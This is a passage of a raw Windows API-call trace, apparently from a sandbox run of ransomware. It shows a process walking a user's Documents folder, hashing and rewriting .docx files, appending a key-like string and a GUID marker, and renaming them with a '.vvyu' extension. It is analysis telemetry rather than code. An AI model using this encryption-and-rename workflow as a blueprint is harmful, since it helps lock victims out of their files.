returned 1 [0189.041] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x0, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x2f9fa54) returned 1 [0189.041] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x2a26b08 [0189.042] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x2a26b08, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x2a26b08, pdwDataLen=0x2f9fa54) returned 1 [0189.042] GetLastError () returned 0x0 [0189.042] CryptDestroyHash (hHash=0x2a05de8) returned 1 [0189.042] CryptReleaseContext (hProv=0x31b9f8, dwFlags=0x0) returned 1 [0189.042] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0189.042] UuidCreate (in: Uuid=0x2f9fa48 | out: Uuid=0x2f9fa48) returned 0x0 [0189.042] UuidToStringA (in: Uuid=0x2f9fa48, StringUuid=0x2f9fa40 | out: StringUuid=0x2f9fa40) returned 0x0 [0189.042] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0189.042] RpcStringFreeA (in: String=0x2f9fa40 | out: String=0x2f9fa40) returned 0x0 [0189.042] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0189.042] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0189.042] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xf060) returned 0x2af5168 [0189.043] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0189.043] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0189.043] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2adfa00 [0189.043] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0189.043] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2a7d6f0 [0189.043] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9f30 [0189.043] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae29f8 [0189.043] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0da18 [0189.043] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae2a40 [0189.043] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0da30 [0189.043] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0da60 [0189.043] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0dac0 [0189.043] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0da78 [0189.043] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x2a06f58 [0189.043] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x2aebfa0 [0189.043] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2aebfa0, Size=0x218) returned 0x2aedfa0 [0189.043] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x2af1f88 [0189.043] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0da60 | out: hHeap=0x2c0000) returned 1 [0189.044] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0da78 | out: hHeap=0x2c0000) returned 1 [0189.044] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dac0 | out: hHeap=0x2c0000) returned 1 [0189.044] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a06f58 | out: hHeap=0x2c0000) returned 1 [0189.044] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af1f88 | out: hHeap=0x2c0000) returned 1 [0189.044] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0dac0 [0189.044] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7db0 [0189.044] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0da78 [0189.044] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ae8 [0189.044] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x2a0da60 [0189.044] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7de0 [0189.045] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x2f5b18 [0189.045] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ba8 [0189.045] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9ed0 [0189.045] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26b08 [0189.045] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x2a19588 [0189.045] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26ac8 [0189.045] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7dc0 [0189.045] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0189.045] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0da78 | out: hHeap=0x2c0000) returned 1 [0189.045] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0189.045] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0da60 | out: hHeap=0x2c0000) returned 1 [0189.045] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0189.045] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0189.045] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dac0 | out: hHeap=0x2c0000) returned 1 [0189.046] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0189.046] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9f30 | out: hHeap=0x2c0000) returned 1 [0189.046] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aedfa0 | out: hHeap=0x2c0000) returned 1 [0189.046] GetCurrentThreadId () returned 0x5d8 [0189.046] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae00c8 [0189.046] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x2ae3fd8 [0189.046] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x2a42698 [0189.047] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b9f8 [0189.047] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x2ae2eb8 [0189.047] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7db0 [0189.047] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0189.047] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae03e0 [0189.047] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0189.047] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0189.047] GetCurrentThreadId () returned 0x5d8 [0189.047] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0189.047] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0189.047] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x2f5b18 [0189.047] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0189.048] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0189.048] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0189.048] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0189.048] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0189.048] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae02d8 [0189.048] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0189.048] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x2a40160 [0189.048] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7db0 [0189.048] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2adffc0 [0189.048] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0189.049] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0dac0 [0189.049] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0189.049] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0189.049] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e00 [0189.049] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e10 [0189.049] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e20 [0189.049] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e30 [0189.049] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0189.049] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0189.049] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0da60 [0189.049] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0189.049] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e00 [0189.049] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0189.049] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0189.049] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e60 [0189.049] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e70 [0189.049] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e80 [0189.049] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0da78 [0189.049] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e70 | out: hHeap=0x2c0000) returned 1 [0189.049] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ae8 [0189.049] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e60 | out: hHeap=0x2c0000) returned 1 [0189.049] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0da48 [0189.050] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e80 | out: hHeap=0x2c0000) returned 1 [0189.050] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0dad8 [0189.050] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0189.050] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e40 [0189.050] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0189.050] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0daa8 [0189.050] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0189.050] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0da90 [0189.050] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0189.050] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0daf0 [0189.050] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0da90 | out: hHeap=0x2c0000) returned 1 [0189.050] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0da90 [0189.050] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0daa8 | out: hHeap=0x2c0000) returned 1 [0189.050] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e10 [0189.050] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0189.050] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26aa8 [0189.050] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0189.050] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1c) returned 0x2ad7ba8 [0189.050] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0da60 | out: hHeap=0x2c0000) returned 1 [0189.050] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0da60 [0189.050] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0189.050] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x2af1f88 [0189.050] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dac0 | out: hHeap=0x2c0000) returned 1 [0189.050] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a198d0 [0189.050] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0daf0 | out: hHeap=0x2c0000) returned 1 [0189.050] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x2af2198 [0189.050] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0189.050] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x2f5b18 [0189.050] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0189.050] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a197b8 [0189.051] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0da60 | out: hHeap=0x2c0000) returned 1 [0189.051] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x2af23b0 [0189.051] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a198d0 | out: hHeap=0x2c0000) returned 1 [0189.051] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae01d0 [0189.051] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0189.051] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f8 | out: hHeap=0x2c0000) returned 1 [0189.051] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae02d8 | out: hHeap=0x2c0000) returned 1 [0189.052] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae01d0 | out: hHeap=0x2c0000) returned 1 [0189.052] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26aa8 | out: hHeap=0x2c0000) returned 1 [0189.052] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a197b8 | out: hHeap=0x2c0000) returned 1 [0189.052] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af2198 | out: hHeap=0x2c0000) returned 1 [0189.053] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af23b0 | out: hHeap=0x2c0000) returned 1 [0189.053] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0189.053] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0189.053] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0da90 | out: hHeap=0x2c0000) returned 1 [0189.053] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0189.053] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dad8 | out: hHeap=0x2c0000) returned 1 [0189.053] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0189.053] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0da78 | out: hHeap=0x2c0000) returned 1 [0189.053] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0da48 | out: hHeap=0x2c0000) returned 1 [0189.054] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2eb8 | out: hHeap=0x2c0000) returned 1 [0189.054] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0189.054] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae03e0 | out: hHeap=0x2c0000) returned 1 [0189.054] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0da30 | out: hHeap=0x2c0000) returned 1 [0189.055] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2a40 | out: hHeap=0x2c0000) returned 1 [0189.055] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af1f88 | out: hHeap=0x2c0000) returned 1 [0189.055] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adffc0 | out: hHeap=0x2c0000) returned 1 [0189.055] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40160 | out: hHeap=0x2c0000) returned 1 [0189.056] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a19588 | out: hHeap=0x2c0000) returned 1 [0189.056] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26b08 | out: hHeap=0x2c0000) returned 1 [0189.056] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0189.056] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0189.056] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9ed0 | out: hHeap=0x2c0000) returned 1 [0189.056] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0189.057] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0189.057] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adfa00 | out: hHeap=0x2c0000) returned 1 [0189.057] WriteFile (in: hFile=0x584, lpBuffer=0x2af5168*, nNumberOfBytesToWrite=0xf050, lpNumberOfBytesWritten=0x2f9fb14, lpOverlapped=0x0 | out: lpBuffer=0x2af5168*, lpNumberOfBytesWritten=0x2f9fb14*=0xf050, lpOverlapped=0x0) returned 1 [0189.058] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af5168 | out: hHeap=0x2c0000) returned 1 [0189.059] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0xf055, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0189.059] WriteFile (in: hFile=0x584, lpBuffer=0x2ae00c8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ae00c8*, lpNumberOfBytesWritten=0x2f9fb50*=0x100, lpOverlapped=0x0) returned 1 [0189.059] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae00c8 | out: hHeap=0x2c0000) returned 1 [0189.059] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2eba0 [0189.059] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x428) returned 0x2af1f88 [0189.059] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2af1f88, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0189.059] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x430) returned 0x2af23b8 [0189.060] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af1f88 | out: hHeap=0x2c0000) returned 1 [0189.060] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2eba0 | out: hHeap=0x2c0000) returned 1 [0189.060] WriteFile (in: hFile=0x584, lpBuffer=0x2af23b8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2af23b8*, lpNumberOfBytesWritten=0x2f9fb50*=0x28, lpOverlapped=0x0) returned 1 [0189.060] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af23b8 | out: hHeap=0x2c0000) returned 1 [0189.060] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0189.060] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x2f9fb50*=0x26, lpOverlapped=0x0) returned 1 [0189.061] CloseHandle (hObject=0x584) returned 1 [0189.062] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2eba0 [0189.062] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x2af1f88 [0189.062] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2eba0 | out: hHeap=0x2c0000) returned 1 [0189.063] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Documents\\bDmsvG.docx" (normalized: "c:\\users\\keecfmwgj\\documents\\bdmsvg.docx"), lpNewFileName="C:\\Users\\kEecfMwgj\\Documents\\bDmsvG.docx.vvyu" (normalized: "c:\\users\\keecfmwgj\\documents\\bdmsvg.docx.vvyu")) returned 1 [0189.064] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af1f88 | out: hHeap=0x2c0000) returned 1 [0189.064] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0189.064] VirtualFree (lpAddress=0x2620000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0189.066] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0189.067] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x7996bf30, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e8588a0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x192, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0189.067] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae2a40 [0189.067] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0189.067] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2a40 | out: hHeap=0x2c0000) returned 1 [0189.067] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Documents\\desktop.ini") returned=".ini" [0189.067] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0189.068] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x691c4140, ftCreationTime.dwHighDateTime=0x1d855c4, ftLastAccessTime.dwLowDateTime=0xd8965250, ftLastAccessTime.dwHighDateTime=0x1d87959, ftLastWriteTime.dwLowDateTime=0xd8965250, ftLastWriteTime.dwHighDateTime=0x1d87959, nFileSizeHigh=0x0, nFileSizeLow=0x1a01, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Dr8UIj1jmG.docx", cAlternateFileName="DR8UIJ~1.DOC")) returned 1 [0189.068] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae2a40 [0189.068] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0189.068] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2a40 | out: hHeap=0x2c0000) returned 1 [0189.068] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Documents\\Dr8UIj1jmG.docx") returned=".docx" [0189.068] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\Dr8UIj1jmG.docx" (normalized: "c:\\users\\keecfmwgj\\documents\\dr8uij1jmg.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0189.069] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x2f9fb40 | out: lpFileSize=0x2f9fb40*=6657) returned 1 [0189.069] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2620000 [0189.072] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x19db, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0189.072] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x2f9fb78, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb78*=0x26, lpOverlapped=0x0) returned 1 [0189.074] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0189.075] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0189.075] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, 